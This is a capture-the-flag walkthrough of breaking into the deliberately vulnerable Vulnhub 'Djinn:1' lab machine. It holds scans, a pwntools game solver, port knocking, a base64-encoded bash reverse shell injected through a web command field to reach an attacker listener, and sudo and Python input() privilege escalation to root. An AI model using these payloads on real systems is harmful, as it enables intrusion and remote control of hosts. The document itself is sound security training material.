Walkthrough: Vulnhub - Djinn:1

· by Christoph Stoettner · Read in about 14 min · (2819 words)
Downloads and Informations
  • djinn:1 is the next machine I want to break in.

Description on Vulnhub
  • Level: Beginner-Intermediate

  • flags: user.txt and root.txt

  • Format: Virtual Machine (Virtualbox - OVA)

  • Operating System: Linux

The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.

Recon

Djinn shows its actual IP address on the login prompt, so there is no need to run nmap -sn or netdiscover.

2019 12 30 17 30 20
Figure 1. Login screen
nmap -A 192.168.14.106

Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:32 EST
Nmap scan report for 192.168.14.106
Host is up (0.00078s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                (1)
| -rw-r--r--    1 0        0              11 Oct 20 23:54 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21 00:23 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21 00:23 message.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.14.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh                                                   (2)
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.14.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
1FTP Anonymous login allowed
2SSH is filtered

Not a lot, so let’s try all ports.

root@kali:~# nmap -A -p- 192.168.14.106
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:43 EST
Nmap scan report for 192.168.14.106
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20 23:54 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21 00:23 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21 00:23 message.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.14.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   filtered ssh
1337/tcp open     waste?
| fingerprint-strings:
|   NULL:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '-', 8)
|   RPCCheck:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '*', 6)
7331/tcp open     http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.80%I=7%D=12/30%Time=5E0A619F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__
SF:\x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x2
SF:0__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_
SF:\x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20
SF:\|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|
SF:\x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20math
SF:s\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x2
SF:0you\x20your\x20gift\.\n\(3,\x20'-',\x208\)\n>\x20")%r(RPCCheck,1BC,"\x
SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\
SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\
SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\
SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\
SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x
SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x
SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you
SF:r\x20gift\.\n\(7,\x20'\*',\x206\)\n>\x20");
MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.14.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.76 seconds

That looks more interesting. So let’s start from the top.

FTP

ftp 192.168.14.106
Connected to 192.168.14.106.
220 (vsFTPd 3.0.3)
Name (192.168.14.106:root): anonymous     (1)
331 Please specify the password.          (2)
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20 23:54 creds.txt
-rw-r--r--    1 0        0             128 Oct 21 00:23 game.txt
-rw-r--r--    1 0        0             113 Oct 21 00:23 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.02 secs (0.6338 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.02 secs (7.6252 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.02 secs (7.1573 kB/s)
1Connect as user anonymous
2no password

Files content

I replace cat with bat. I like the output and so I create an alias in the .bashrc

alias cat='bat'

root@kali:~/djinn# cat creds.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: creds.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ nitu:81299
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat game.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: game.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
   2   │ final level and get the prize.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────
root@kali:~/djinn# cat message.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: message.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ @nitish81299 I am going on holidays for few days, please take care of all the work.
   2   │ And don't mess up anything.
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────

Port 1337

Opening with netcat:

nc 192.168.14.106 1337
  ____                        _____ _
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(3, '*', 1)
>

So we get a math equation to solve here and the message says we need to solve 1000 of them.

Solve with pwntools

A good way to solve such network games is using Python and pwntools.

Install pwntools with Python 3 (I use Kali Linux 2019.4):

Installing pwntools directly with pip3 ran into an error. The master-branch does not fully support Python 3.

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3

Solution

mathsolve.py
#!/usr/bin/env python3

from pwn import *

c = remote('192.168.14.106',1337)

c.recvuntil("\n\n", drop=True)

# Loop 1000 times
for i in range(1001):

    # read from ( to ,
    c.recvuntil("(", drop=True)
    int1 = c.recvuntil(",", drop=True)

    # read from ' to ,
    c.recvuntil("'", drop=True)
    mathsym = c.recvuntil("'", drop=True)

    # read from , to )
    c.recvuntil(", ", drop=True)
    int2 = c.recvuntil(")", drop=True)

    # calculate equation
    equation = int1+mathsym+int2
    print(str(i)+"th answer= "+str(equation))

    # send answer
    c.sendlineafter('>',equation)

c.interactive()
➜ chmod +x mathsolve.py
➜ ./mathsolve.py
...
999th answer= b'1+6'
1000th answer= b'6*8'
[*] Switching to interactive mode
 Here is your gift, I hope you know what to do with it:

1356, 6784, 3409

[*] Got EOF while reading in interactive

Looks like a sequence to port knocking.

SSH

Check ssh port
➜ nmap -p22 192.168.14.106

PORT   STATE    SERVICE
22/tcp filtered ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)
Install knockd
➜ apt install knockd
Try to open the ssh port
➜ knock 192.168.14.106 1356 6784 3409
Check ssh port again
➜ nmap -p22 192.168.14.106

PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC)

So the port is open. I tried to connect with the credentials found on the anonymous ftp login, but wasn’t successful. Damn lot of fun, but still not able to connect.

➜ hydra -C creds.txt -u 192.168.14.106 ssh

[DATA] max 1 task per 1 server, overall 1 task, 1 login try, ~1 try per task
[DATA] attacking ssh://192.168.14.106:22/
1 of 1 target completed, 0 valid passwords found

I tried several combinations, with user nitish like mentioned in the message.txt. Loaded a larger wordlist for passwords, but wasn’t successful.

Port 7331

Accessing http://192.168.14.106:7331 opens a web page. Let’s digg into that.

gobuster
➜ gobuster dir -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -u http://192.168.14.106:7331
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.14.106:7331
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directories.jbrofuzz
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/31 08:18:56 Starting gobuster
===============================================================
[ERROR] 2019/12/31 08:18:56 [!] parse http://192.168.14.106:7331/%: invalid URL escape "%"
/?? (Status: 200)
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2019/12/31 08:20:22 Finished

With /wish we can execute commands on the webserver and get some response in the black background of the image of /genie.

To see it little bit easier, I copied the request as cUrl command from browser devtools:

➜ curl -L 'http://192.168.14.106:7331/wish' \
  -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  --compressed -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://192.168.14.106:7331' -H 'DNT: 1' -H 'Connection: keep-alive' \
  -H 'Referer: http://192.168.14.106:7331/wish' -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
  --data "cmd=ls"

...
<p> app.py
app.pyc
static
templates
</p>
...

Testing with ls / and some other commands, end with:

<p> Wrong choice of words </p>

I tried several remote shell commands here, but wasn’t successful. Raj Chandel’s Blog gave me the idea to do a base64 conversion of the remote shell.

Solving it on the commandline without a webservice is possible with curl and some commandlinefu:

➜ curl 'http://192.168.14.106:7331/wish' \
  -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.7,de;q=0.3' --compressed \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://192.168.14.106:7331' \
  -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.14.106:7331/wish' \
  -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' \
  --data-urlencode \  (1)
  "cmd=echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash"
1use --data-urlencode instead of --data

Raj takes the remote shell command bash -i >& /dev/tcp/192.168.14.107/8080 0>&1 and encode it through https://www.base64encode.org/, but we can get the same result with

Commandline base64 encode
echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64

Now let’s connect this on the console. $() runs the command in parantheses first, so this adds the base64 encoded string,

echo $(echo 'bash -i >& /dev/tcp/192.168.14.107/8080 0>&1' | base64) | base64 -d | bash

is the same as:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA+JjEK | base64 -d | bash

but we can easier change IP or port. Switching the curl option from --data to --data-urlencode converts the command into echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA%2BJjEK%20%7C%20base64%20-d%20%7C%20bash.

Before running our curl command start the netcat listener:

nc -nlvp 8080
listening on [any] 8080 ...

When we now run the curl command, we get a shell in netcat.

Remote shell

nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.14.107] from (UNKNOWN) [192.168.14.106] 44802
bash: cannot set terminal process group (740): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$
python -c 'import pty;pty.spawn("/bin/bash")'

www-data@djinn:/opt/80$ ls
ls
app.py  app.pyc  static  templates

www-data@djinn:/opt/80$ cat app.py | grep CREDS
cat app.py | grep nit
CREDS = "/home/nitish/.dev/creds.txt"

www-data@djinn:/opt/80$ cd /home/nitish/.dev
cd /home/nitish/.dev

www-data@djinn:/home/nitish/.dev$ ls
ls
creds.txt

www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9

Get user.txt flag

www-data@djinn:/home/nitish/.dev$ su - nitish
su - nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:~$ ls
ls
user.txt

nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c       (1)

nitish@djinn:~$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie     (2)
1First flag user.txt
2nitish is allowed to run /usr/bin/genie with sudo without password

The shell is still not that good, we can use ssh with user nitish and the password above to successfully login. So we get a more stable shell.

Get root flag

ls -al /usr/bin/genie
-rwsr-x---  1 sam    nitish     72000 Nov 11 19:09  genie
nitish@djinn:~$ genie -e id test
genie -e id test
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)

nitish@djinn:~$ sudo -u sam genie -e id test
sudo -u sam genie -e id test
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

Check commands like ls /home/sam or bash ended with You are a noob hacker!!, same for everything with -p.

man genie
SYNOPSIS
       genie [-h] [-g] [-p SHELL] [-e EXEC] wish

DESCRIPTION
       genie would complete all your wishes, even the naughty ones.

       We  all  dream  of getting those crazy privelege escalations, this will
       even help you acheive that.

OPTIONS
       wish

              This is the wish you want to make .

       -g, --god

              Sometime we all would like to make a wish to  god,  this  option
              let you make wish directly to God;

              Though  genie can't gurantee you that your wish will be heard by
              God, he's a busy man you know;

       -p, --shell

              Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"

       -e, --exec

              Execute command on someone else computer is just too  damn  fun,
              but this comes with some restrictions.

       -cmd

              You know sometime all you new is a damn CMD, windows I love you.

SEE ALSO
       mzfr.github.io

BUGS
       There  are  shit  loads  of bug in this program, it's all about finding

First of all, you have to add a wish at the end of the command, but the wish mustn’t be wish, or you will get an answer like Pass your wish to GOD, he might be able to help you.

We’re user sam now
$ whoami
whoami
sam
Check sudoers
nitish@djinn:~$ sudo -u sam genie -cmd man
sudo -u sam genie -cmd man
my man!!

$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago

Now we need to run /root/lago

We get four choices.

What do you want to do ?
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice:

I ran a grep -ir naughtys .* as user sam and got .pyc as hit. pyc is compiled python code, so maybe we find something about the lago command.

Double check with string .pyc shows lots of strings from /root/lago.

So running http server and download to Kali:

On djinn vm
python3 -m http.server
On Kali
curl -O http://192.168.14.106:8000/.pyc
pip3 install uncompyle6

uncompyle6 .pyc

...
def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:     (1)
        system('/bin/sh')
    else:
        print 'Better Luck next time'

...
1if input == num start a shell
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num     (1)
# whoami
root
# bash
root@djinn:/home/sam#
1Use the variable name directly and we got a new shell as root

root.flag

cd root
./proof.sh

    _                        _             _ _ _
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Tue Dec 31 23:18:56 IST 2019
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)